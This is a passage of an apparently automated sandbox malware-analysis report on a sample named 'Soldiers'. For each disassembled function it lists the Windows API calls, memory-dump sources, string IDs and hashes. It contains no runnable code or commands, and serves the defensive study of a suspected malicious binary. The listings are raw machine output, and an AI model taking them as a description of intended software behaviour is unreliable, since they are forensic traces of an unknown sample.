                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                          • String ID:
                                                          • API String ID: 4176008265-0
                                                          • Opcode ID: 25c77cfcf03ce51dedad847edbbff38ef3ed2d35bfc3eea65f1e455de07ff710
                                                          • Instruction ID: 9cc1b7b1f59e22b5b913afd006be971fc921f8b840f68557df2b2d2dfaea406d
                                                          • Opcode Fuzzy Hash: 25c77cfcf03ce51dedad847edbbff38ef3ed2d35bfc3eea65f1e455de07ff710
                                                          • Instruction Fuzzy Hash: 71619A71914249AFDB20CFA4CC88EBFBBB8FB81308F944459F851A7291D771AD45EB20
                                                          Function 00967548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 009675CA
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 009675CD
                                                          • GetWindowLongW.USER32(?,000000F0,?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 009675F1
                                                          • _memset.LIBCMT ref: 00967602
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00967614
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007,?,00000000,009A77C4), ref: 0096768C
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow_memset
                                                          • String ID:
                                                          • API String ID: 830647256-0
                                                          • Opcode ID: 73ed50c3ea97c78e6c1ff235e6319836d3d60ac3496de1883e985b14aea1943c
                                                          • Instruction ID: 3c5a48518cd3aceeaa0153f1aca40876a4ac47aff891b043b9806f696eb608f6
                                                          • Opcode Fuzzy Hash: 73ed50c3ea97c78e6c1ff235e6319836d3d60ac3496de1883e985b14aea1943c
                                                          • Instruction Fuzzy Hash: 2A615875904208AFDB10DFA8CC85EEEB7F8AF49714F100199FA15A72A1D774AE41DBA0
                                                          Function 009377B6 Relevance: 16.6, APIs: 11, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #41.OLEAUT32(0000000C,?,00000000,?,?,?,?,?,?,0093756E,?,?,?,?,?,0093779C), ref: 009377DD
                                                          • #37.OLEAUT32(00000000,?,?,?,?,?,?,0093756E,?,?,?,?,?,0093779C,00000000,?), ref: 00937836
                                                          • #8.OLEAUT32(?,?,?,?,?,?,?,0093756E,?,?,?,?,?,0093779C,00000000,?), ref: 00937848
                                                          • #23.WSOCK32(00000000,00000000,?,?,?,?,?,?,0093756E), ref: 00937868
                                                          • #10.WSOCK32(00000000,?,00000002,00000000,?,?,?,?,?,?,0093756E), ref: 009378BB
                                                          • #24.OLEAUT32(00000000,00000002,00000000,?,?,?,?,?,?,0093756E), ref: 009378CF
                                                          • #9.WSOCK32(?,?,?,?,?,?,?,0093756E), ref: 009378E4
                                                          • #39.OLEAUT32(00000000,?,?,?,?,?,?,0093756E), ref: 009378F1
                                                          • #38.OLEAUT32(00000000,?,?,?,?,?,?,0093756E), ref: 009378FA
                                                          • #9.WSOCK32(?,?,?,?,?,?,?,0093756E), ref: 0093790C
                                                          • #38.OLEAUT32(00000000,?,?,?,?,?,?,0093756E,?,?,?,?,?,0093779C,00000000,?), ref: 00937917
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8aa543edd0542042fae342574dffe153395a74912e23ce75e1786ab8df2968e6
                                                          • Instruction ID: 23898d701c969c8ed1c6a63a6940c6f1ce1f8dcc66b4a0c1aeb56ad25b660b3e
                                                          • Opcode Fuzzy Hash: 8aa543edd0542042fae342574dffe153395a74912e23ce75e1786ab8df2968e6
                                                          • Instruction Fuzzy Hash: FA416375A04119EFCB10DFA8CC889ADBBB9FF48354F008469E959E7261D730A985DFA0
                                                          Function 00958AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E4D37: __itow.LIBCMT ref: 008E4D62
                                                            • Part of subcall function 008E4D37: __swprintf.LIBCMT ref: 008E4DAC
                                                          • CoInitialize.OLE32 ref: 00958AED
                                                          • CoUninitialize.OLE32 ref: 00958AF8
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00973BBC,?), ref: 00958B58
                                                          • IIDFromString.OLE32(?,?), ref: 00958BCB
                                                          • #8.OLEAUT32(?), ref: 00958C65
                                                          • #9.WSOCK32(?,?), ref: 00958CC6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CreateFromInitializeInstanceStringUninitialize__itow__swprintf
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 1994486276-1287834457
                                                          • Opcode ID: 43e0190eb1fd7701f126ff6807b2721ef4fef5ed92073a57ceef1bd786b29011
                                                          • Instruction ID: 7e43521dc09c251f5247f79c5401f0cf43815cc524333dfb277ecb48b3280029
                                                          • Opcode Fuzzy Hash: 43e0190eb1fd7701f126ff6807b2721ef4fef5ed92073a57ceef1bd786b29011
                                                          • Instruction Fuzzy Hash: 2E61ACB0208701AFD710DF16D888F6BB7E8EF85715F004849F985AB291DB74ED48CBA2
                                                          Function 00955E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #115.WSOCK32(00000101,?), ref: 00955E7E
                                                          • #10.WSOCK32(?,?,?), ref: 00955EC3
                                                          • #52.WSOCK32(?), ref: 00955ECF
                                                          • IcmpCreateFile.IPHLPAPI ref: 00955EDD
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0,00000000), ref: 00955F4D
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0,00000000), ref: 00955F63
                                                          • IcmpCloseHandle.IPHLPAPI(00000000,00000002,00000000), ref: 00955FD8
                                                          • #116.WSOCK32 ref: 00955FDE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$#115#116CloseCreateFileHandle
                                                          • String ID: Ping
                                                          • API String ID: 1853569507-2246546115
                                                          • Opcode ID: 596b0591252b44d2fc473629c925db0f470628a53148891d440b3908f9a3572d
                                                          • Instruction ID: 0740b05c6db177acb86bd37e2035f9a2c5266b7dc2737286f8dacf54f2a7a7fa
                                                          • Opcode Fuzzy Hash: 596b0591252b44d2fc473629c925db0f470628a53148891d440b3908f9a3572d
                                                          • Instruction Fuzzy Hash: E651C0316086009FD720EF25CC59B2ABBE4EF88711F054929FD59DB2A2DB30E944DB42
                                                          Function 008F4D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 008F4E22
                                                          • KillTimer.USER32(?,00000001), ref: 008F4E4C
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008F4E6F
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F4E7A
                                                          • CreatePopupMenu.USER32 ref: 008F4E8E
                                                          • PostQuitMessage.USER32(00000000), ref: 008F4EAF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated
                                                          • API String ID: 129472671-2362178303
                                                          • Opcode ID: b0cc39a0f3eb43f56baba0e345e7c08089085f0666d326a9031fa3aadd1a55bd
                                                          • Instruction ID: 6096f92c2416ed8b7388d62c90c9dbd25e67b6163ded866f3bcaa84f572f9929
                                                          • Opcode Fuzzy Hash: b0cc39a0f3eb43f56baba0e345e7c08089085f0666d326a9031fa3aadd1a55bd
                                                          • Instruction Fuzzy Hash: 8641EB3122C20DABDF255FB89C4EB7B7695FBC6324F001517FB02D21A1DA65AC50A7A1
                                                          Function 0094BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0094BB13
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0094BB89
                                                          • GetLastError.KERNEL32 ref: 0094BB93
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0094BC00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: 8a99c274acdeeb1b5d9d51d43968c7ceeac8ae7456daf78730e464af6f78d732
                                                          • Instruction ID: 3052694750015cec9f55d176be49c93ac92faff2588f55bb024d976e930c0ff7
                                                          • Opcode Fuzzy Hash: 8a99c274acdeeb1b5d9d51d43968c7ceeac8ae7456daf78730e464af6f78d732
                                                          • Instruction Fuzzy Hash: A631E135A00208EFDB10DFA9C859EBDB7B8FF84704F10812AE909D7295EB74D941CB91
                                                          Function 00939B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                            • Part of subcall function 0093B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0093B7BD
                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 00939BCC
                                                          • GetDlgCtrlID.USER32(?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 00939BD7
                                                          • GetParent.USER32(?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 00939BF3
                                                          • SendMessageW.USER32(00000000,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?,?,ComboBox), ref: 00939BF6
                                                          • GetDlgCtrlID.USER32(?,?,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?), ref: 00939BFF
                                                          • GetParent.USER32(?,00000111,?,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?), ref: 00939C1B
                                                          • SendMessageW.USER32(00000000,?,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?), ref: 00939C1E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: a7e6eab56236f0037cccfeece79609ff0f4e1af67cadd5932a4def60b544799c
                                                          • Instruction ID: b3bacd9d9fce2391ef3590945fe5d28ccaa347b073fc2764a73d4481d2f5bde7
                                                          • Opcode Fuzzy Hash: a7e6eab56236f0037cccfeece79609ff0f4e1af67cadd5932a4def60b544799c
                                                          • Instruction Fuzzy Hash: 4D21C171A00108AFDF04EB64CC99EFEBBB9EFD5310F100215F9A5932D1DB7549549E20
                                                          Function 00939C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                            • Part of subcall function 0093B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0093B7BD
                                                          • SendMessageW.USER32(?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 00939CB5
                                                          • GetDlgCtrlID.USER32(?,?,?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 00939CC0
                                                          • GetParent.USER32(?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 00939CDC
                                                          • SendMessageW.USER32(00000000,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 00939CDF
                                                          • GetDlgCtrlID.USER32(?,?,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?), ref: 00939CE8
                                                          • GetParent.USER32(?,00000111,?,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?), ref: 00939D04
                                                          • SendMessageW.USER32(00000000,?,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?), ref: 00939D07
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: c7fff8fbee45a9c8cf277210d0ae95360ca21d1d805ed2429dae6adb82edc320
                                                          • Instruction ID: a64390c022d40a80df04bd6844711e5549086269bc4fa6f82612f2b4f38cc3c1
                                                          • Opcode Fuzzy Hash: c7fff8fbee45a9c8cf277210d0ae95360ca21d1d805ed2429dae6adb82edc320
                                                          • Instruction Fuzzy Hash: E721B076A00108BFDF00EBA4CC96EFEBBB9EF94300F100115F965972D1DBB589659E21
                                                          Function 00939D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetParent.USER32 ref: 00939D27
                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00939D3C
                                                          • _wcscmp.LIBCMT ref: 00939D4E
                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00939DC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                          • API String ID: 1704125052-3381328864
                                                          • Opcode ID: 9c6f5c84532951d20079b882aaa125ac9b70a6a462af04c56e7b1cbecf9c50b3
                                                          • Instruction ID: 323a2945b4bcd835751830c2964154e0892b78cc93d21869487f17c8478e0396
                                                          • Opcode Fuzzy Hash: 9c6f5c84532951d20079b882aaa125ac9b70a6a462af04c56e7b1cbecf9c50b3
                                                          • Instruction Fuzzy Hash: 44110A7624C302BEFA002628EC07FAA739CDF45728F200016F924A40D1FAE569515D95
                                                          Function 00958F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #8.OLEAUT32(?), ref: 00958FC1
                                                          • CoInitialize.OLE32(00000000,00970980), ref: 00958FEE
                                                          • CoUninitialize.OLE32 ref: 00958FF8
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 009590F8
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00959225
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00973BDC), ref: 00959259
                                                          • CoGetObject.OLE32(?,00000000,00973BDC,?), ref: 0095927C
                                                          • SetErrorMode.KERNEL32(00000000), ref: 0095928F
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0095930F
                                                          • #9.WSOCK32(?), ref: 0095931F
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$Object$FileFromInitializeInstanceRunningTableUninitialize
                                                          • String ID:
                                                          • API String ID: 3414436084-0
                                                          • Opcode ID: 4ce8bbbf211123f291cc4f6ceff1fe87cbc8d0d967f1e50dd28c9efd3c667bf2
                                                          • Instruction ID: e262f6fa5a616306409391759bcd7a2ce123b5d84e390a25da39a7c3b0b80a37
                                                          • Opcode Fuzzy Hash: 4ce8bbbf211123f291cc4f6ceff1fe87cbc8d0d967f1e50dd28c9efd3c667bf2
                                                          • Instruction Fuzzy Hash: D2C11271608305EFE700DF69C88496AB7E9FF89709F00491CF98A9B251DB71ED09CB92
                                                          Function 00947F4B Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #77.OLEAUT32(0000004E,?,00000002,?,00037269,00000000,?,?,?,?,?,00947B47,?,?,0000004E,?), ref: 00948027
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0878b25b83c14c7f8ef9e8007782739a4aa9fee80b54641e3340e7e5bb5b268c
                                                          • Instruction ID: 72a250079a04f26f87d6a7003b096d7bbdccc680435b16b7e9912cf76a6001ad
                                                          • Opcode Fuzzy Hash: 0878b25b83c14c7f8ef9e8007782739a4aa9fee80b54641e3340e7e5bb5b268c
                                                          • Instruction Fuzzy Hash: 9EB1AF71A0420A9FDB00DF98D884FBFB7B8FF49361F104429E615E7251DB74A941CBA1
                                                          Function 009419CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 009419EF
                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00940A67,?,00000001), ref: 00941A03
                                                          • GetWindowThreadProcessId.USER32(00000000,?,?,?,?,?,00940A67,?,00000001), ref: 00941A0A
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00940A67,?,00000001), ref: 00941A19
                                                          • GetWindowThreadProcessId.USER32(?,00000000,?,?,?,?,?,00940A67,?,00000001), ref: 00941A2B
                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00940A67,?,00000001), ref: 00941A44
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00940A67,?,00000001), ref: 00941A56
                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00940A67,?,00000001), ref: 00941A9B
                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00940A67,?,00000001), ref: 00941AB0
                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00940A67,?,00000001), ref: 00941ABB
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: 7538c597775b3e9fd58cac397f86b07abb9ed5a875db3a3be71460be50ee91a3
                                                          • Instruction ID: 0108d1611b761ba9e8200c6783fb44528550ed0103d75b35e2a497341330f6fc
